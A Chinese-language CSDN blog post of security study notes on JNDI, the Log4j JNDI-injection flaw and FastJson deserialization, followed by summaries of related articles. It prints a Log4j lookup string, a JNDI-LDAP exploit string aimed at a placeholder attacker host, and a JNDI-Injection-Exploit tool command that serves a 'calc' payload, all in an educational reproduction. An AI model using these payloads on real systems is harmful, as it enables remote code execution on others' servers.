安全学习_开发相关_Java第三方组件Log4j&FastJSON及相关安全问题简介

最新推荐文章于 2024-01-24 13:23:28 发布
最新推荐文章于 2024-01-24 13:23:28 发布
阅读量2.6k 收藏 16
点赞数 25
分类专栏: 安全学习笔记_开发相关 文章标签: 安全 学习 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55977327/article/details/133397016
版权

文章目录


请添加图片描述

JNDI:(见图)

Java Naming and Directory Interface (Java 命名和目录接口 ),JNDI 提供统一的客户端 API,通过不同的服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录服务,使得 JAVA 应用程可以通过 JNDI 实现和这些命名服务和目录服务之间的交互。

Java-三方组件-Log4J&JNDI

Log4J:

Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。

Log4j-组件安全复现

漏洞出现条件:

1、开发源码中引用漏洞组件入log4j

2、开发中使用组件的代码(触发漏洞代码)

3、可控变量去传递payload来实现攻击

4、利用jndi-ldap执行

jndi中的ldap和rmi是最常用的方法进行远程调用。

测试:

使用Log4j

// 创建logger对象,用于输出日志
public static final Logger logger = LogManager.getLogger(Log4jTest.class);
public static void main(String[] args) {
    logger.error("错误日志");
}

测试:

输入字符串${java:os},显示系统信息。

public static final Logger logger = LogManager.getLogger(Log4jTest.class);
public static void main(String[] args) {
    String code = "${java:vm}";
    logger.error("{}",code);
}

结果:

[main] ERROR com.log4jdemo.Log4jTest - Windows 11 10.0, architecture: amd64-64

String exp="${jndi:ldap://xx.xx.xx.xx:xx/xxx}";

服务器:

使用jndi注入工具生成地址。

java -jar JNDI-Injection-Exploit.jar -C "calc" -A xx.xx.xx.xx

Java-三方组件-FastJson

FastJson:

在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上是标准的数据交换格式。它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。FastJson是阿里巴巴的的开源库,用于对JSON格式的数据进行解析和打包。

底层通过反射原理实现。

Fastjson-组件安全复现

1、Maven引用Fastjson

2、创建需转换类对象User

3、使用Fastjson进行数据转换

4、数据转换(对象转Json,Json转对象)

对象转Json(带类型)

// user 对象
User user = new User("chuan","man",12);

// 把数据转换为Json格式数据,存储在String字符串中,选用第三方组件fastjson做这个功能。
String string = JSONObject.toJSONString(user);
// 打印查看
System.out.println("string = " + string);

// SerializerFeature.WriteClassName输出转换数据的类型(类),其实本身就带类型
String string2 = JSONObject.toJSONString(user, SerializerFeature.WriteClassName);
System.out.println("多输出转换数据的类型:string2 = " + string2);

Json转对象

// 其中\"为idea自动转义,避免和字符串引号冲突。
String test = "{\"@type\":\"com.fastjsondemo.User\",\"age\":12,\"gender\":\"man\",\"name\":\"chuan\"}";
// test字符串(JSON)转换为Java对象
JSONObject jsonObject = JSON.parseObject(test);
System.out.println(jsonObject);

漏洞成因:

转换数据时造成的。前端得到的JSON对象进行转换时,若JSON对象为用户发送的恶意注入,通过调用一些类方法实现攻击。

Fastjson漏洞复现(大佬文章

https://blog.csdn.net/guo15890025019/article/details/120532891

chuan川、
关注
  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
从源码看Log4j2、FastJson漏洞
wdj_yyds的博客
12-31 4495
前言 远程代码漏洞对广大程序员来并不陌生,远程代码执行是指攻击者可能会通过远程调用的方式来攻击或控制计算机设备,无论该设备在哪里。如果远程代码执行的是一个死循环那服务器的CPU不得美滋滋了。 前段时间,Java 界的知名日志框架 Log4j2 发现了远程代码执行漏洞,漏洞风暴席卷各大公司,编程届异常火热(加班),我们是万万没想到那么牛逼的日志框架有BUG。 这次安全漏洞也有个小插曲,我司的员工发现了漏洞,上报了Apache没告知GXB,我司也受到了处罚,希望下次引以为戒,不过这事程序员不背锅,管理下次
log4j漏洞原理及攻击流程
weixin_54603520的博客
05-14 2311
log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的,上报到Apache之后,12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。
第三方组件安全评估指南
weixin_61856963的博客
07-19 866
持续构建物料清单为每个应用程序持续构建详细的软件材料清单,从而全面洞察每个应用软件的组件情况。如果存在无法验证来源的开源组件,则不允许使用。强化软件供应链通过强化软件供应链来降低安全风险。这包括检查内部和外部源代码、支持脚本、配置文件和其他工件,并创建可信开源组件的内部存储库。而对外部存储库的使用要合理管理。风险管理通过制定策略确定可接受的开源组件、对在代码中发现漏洞或受限软件许可的合理响应,来管理风险。
fastJson反序列化漏洞和log4j漏洞
qq_27275851的博客
07-19 1063
java 两个普及漏洞
第三方组件安全性:第三方组件或软件可能包含漏洞或恶意代码,这对整个系统安全构成威胁
图幻未来的博客
01-24 497
总之在使用过程中,我们要充分认识到第三方组件存在的安全隐患,并加强管理和技术手段的运用来确保其安全稳定地运作于我们的信息化体系中。只有这样我们才能在享受技术创新给我们所带来的便捷的同时也保证自己的数据安全和企业利益不受侵害。
Java常用第三方工具类
qinxun2008081的博客
06-09 4152
Java常用第三方工具类
Log4j2、FastjsonLog4j的BurpSuite插件亲测有效
06-07
Log4jLog4j2和FastjsonJava开发中常用的三个库,它们在软件开发中扮演着重要的角色。Log4j是Apache的一个开源项目,主要用于日志记录,提供了灵活的日志配置,允许开发者根据需求调整日志输出的级别和格式。Log4...
C3P0 fastjson log4j POI3.7+3.8 jar包资源
02-22
在IT行业中,这些资源涉及到的是Java开发中常用的库和框架,包括C3P0数据库连接池,FastJSON数据解析库,Log4j日志记录工具,以及Apache POI办公文档处理库。以下是对这些关键组件的详细介绍: 1. **C3P0**:这是一...
使用SpringBoot+OkHttp+fastjson实现Github的OAuth第三方登录
10-15
主要介绍了使用SpringBoot+OkHttp+fastjson实现Github的OAuth第三方登录,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习
Java_FASTJSON 20x发布更快,更安全,建议您升级.zip
最新发布
05-22
Java_FASTJSON 20x是Java社区中广泛使用的JSON库Fastjson的新版本,它以其高效、易用的特点深受开发者喜爱。此次发布的20x版本带来了显著的性能提升和安全性改进,对于任何正在使用或者考虑使用Fastjson开发团队来...
java调用第三方天气预报实时API接口并解析数据【源码】
07-13
1、封装WeatherInfo实体类,对接口返回的结果进行映射的实体类 2、WeatherUtils类,负责调用第三方天气预报api接口处理的工具类,包括根据城市查询等,返回的格式是json 3、test类,对接口进行功能性测试
企业安全建设中的第三方组件问题
晓川吖的专栏
09-09 1802
简述: 我们知道常见第三方组件分为开源组件和闭源组件。开源组件Open-Source Software实际上就是各个公司、软件开发者基于各种协议公布的源代码开源让所有人使用的软件依赖,只要遵守对应的协议就可以使用。闭源组件一般都是三方的商业公司开发提供,方便研发人员实现业务功能而进行统一定制化的,包括依赖库、SDK等等,大多数是需要付费购买并且没有源代码。 三方组件在项目开发中扮演着很重要的角色,也是软件供应链的重要组成部分,研发在项目开发过程中引入使用三方组件,可以提高研发效率、缩短项目上线的时间并且
信息打点-语言框架&开发组件&FastJson&Shiro&Log4j&SpringBoot等
今天是几号的博客
03-31 665
后端CMS:一般PHP开发居多源码程序(利用源码程序名去搜漏洞情况,源码去下载进行后期的代码审计)前端js 框架(爬取更多的js从里面筛选URL或敏感泄漏key等)也是可以通过对js代码逻辑进行代码审计组件java居多,第三方的功能模块(日志记录,数据监控,数据转换等)常见有过安全漏洞组件(shiro solr log4j sprintboot等)框架php java python都有简单代码的一个整合库,如果使用框架就只需要学习使用框架调用即可。
安全第三方组件的漏洞如何做前置规避?
m0_70655343的博客
07-14 473
要评估风险与合规性,需要针对业务挑战、需求和目标评估现有的安全治理框架——包括数据隐私、第三方风险和IT法规合规需求及差距。安全风险量化、安全开发、法规和标准合规性以及安全教育和培训是关键。第三方组件缺陷又被归结为供应链安全问题,供应链安全需要多方面考虑。没有万能方案,但是组织可以用分层防御的组合来保护供应链。提前为入侵、关闭或中断做好准备,并拥有稳健的事件响应计划很重要。通过实践、测试和易执行的响应计划和补救措施,防止损失。...
安全漏洞:Fastjson反序列化漏洞
热门推荐
孤芳不自赏
05-27 1万+
引言 昨天,我收到了集团安全部门的告警消息:Fastjson≤1.2.80版本存在反序列化漏洞,好家伙,着手开搞,这又是一个不眠夜的开始,哦,为什么说“又”呢?还记得去年12月份log4j2报过重大安全漏洞…… 风险描述 fastjson已使用黑白名单用于防御序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全 影响版本 Fastjson≤1.2.80 解决方案1:升级到最新版本1.2.83..
CSDN技术主题月:实战解读移动信息安全技术
一起来捉 Bug 呀~~
11-24 761
摘要:11 月 12 日,由 CSDN 社区主办的“CSDN 技术主题月——移动信息安全技术的挑战与创新”在北京中关村隆重举行,此次沙龙活动邀请到黄帅(@猴子搬来的救兵Castiel)和姜维(@尼古拉斯_赵四)两位 CSDN 设计专家,以及花甲科技安全实验室负责人泮晓波和知道创宇高级安全顾问锅涛到场,围绕移动信息安全技术主题,共论安全在实践中的挑战与创新。 如今,在 PC 和移动终端已经深度...
React第三方组件3(状态管理之Flux的使用②TodoList上)
oKeYue的博客
03-07 320
微信公众号首发本教程总共5篇,每日更新一篇,请关注我们!你可以进入历史消息查看以往文章,也敬请期待我们的新文章!1、React第三方组件3(状态管理之Flux的使用①简单使用)---2018.03.062、React第三方组件3(状态管理之Flux的使用②TodoList上)---2018.03.073、React第三方组件3(状态管理之Flux的使用③TodoList中)---2018.03.0...
请分别说一下Struts2漏洞、Redis漏洞、shiro漏洞、fastjsonlog4j漏洞的原理
06-12
好的,我会分别解释Struts2漏洞、Redis漏洞、Shiro漏洞、Fastjson漏洞和Log4j漏洞的原理。 1. Struts2漏洞:Struts2是一个广泛使用的Java Web框架,其漏洞主要是由于一些不安全的代码实现导致的。其中最著名的漏洞是Struts2远程代码执行漏洞,攻击者可以利用此漏洞在目标服务器上执行任意代码,进而控制服务器。该漏洞的原因是由于Struts2在处理客户端输入时没有正确过滤恶意代码,导致攻击者可以通过构造恶意请求来执行任意代码。 2. Redis漏洞:Redis是一个开源的内存数据库,其漏洞主要是由于Redis的默认配置不够安全导致的。其中最常见的漏洞是未授权访问漏洞和远程代码执行漏洞。未授权访问漏洞是由于Redis默认情况下没有开启认证,攻击者可以直接连接到Redis服务器并进行恶意操作。远程代码执行漏洞是由于Redis支持执行Lua脚本,攻击者可以通过构造恶意脚本来在Redis服务器上执行任意代码。 3. Shiro漏洞:Shiro是一个Java安全框架,用于处理身份验证、授权、加密等安全相关问题。其漏洞主要是由于Shiro的默认配置不够安全导致的。其中最常见的漏洞是未授权访问漏洞和身份伪造漏洞。未授权访问漏洞是由于Shiro默认情况下没有开启认证,攻击者可以直接访问受保护的资源。身份伪造漏洞是由于攻击者可以通过伪造身份信息来绕过身份验证机制。 4. Fastjson漏洞:Fastjson是一个Java的JSON解析库,其漏洞主要是由于Fastjson在处理JSON数据时没有正确过滤恶意代码导致的。其中最常见的漏洞是远程代码执行漏洞,攻击者可以通过构造恶意JSON数据来在目标服务器上执行任意代码。 5. Log4j漏洞:Log4j是一个Java日志框架,其漏洞主要是由于Log4j的默认配置不够安全导致的。其中最著名的漏洞是Log4Shell漏洞,攻击者可以通过构造恶意的日志信息来在目标服务器上执行任意代码。该漏洞的原因是由于Log4j在处理日志信息时会执行其中的代码,攻击者可以通过构造特定的日志信息来执行任意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值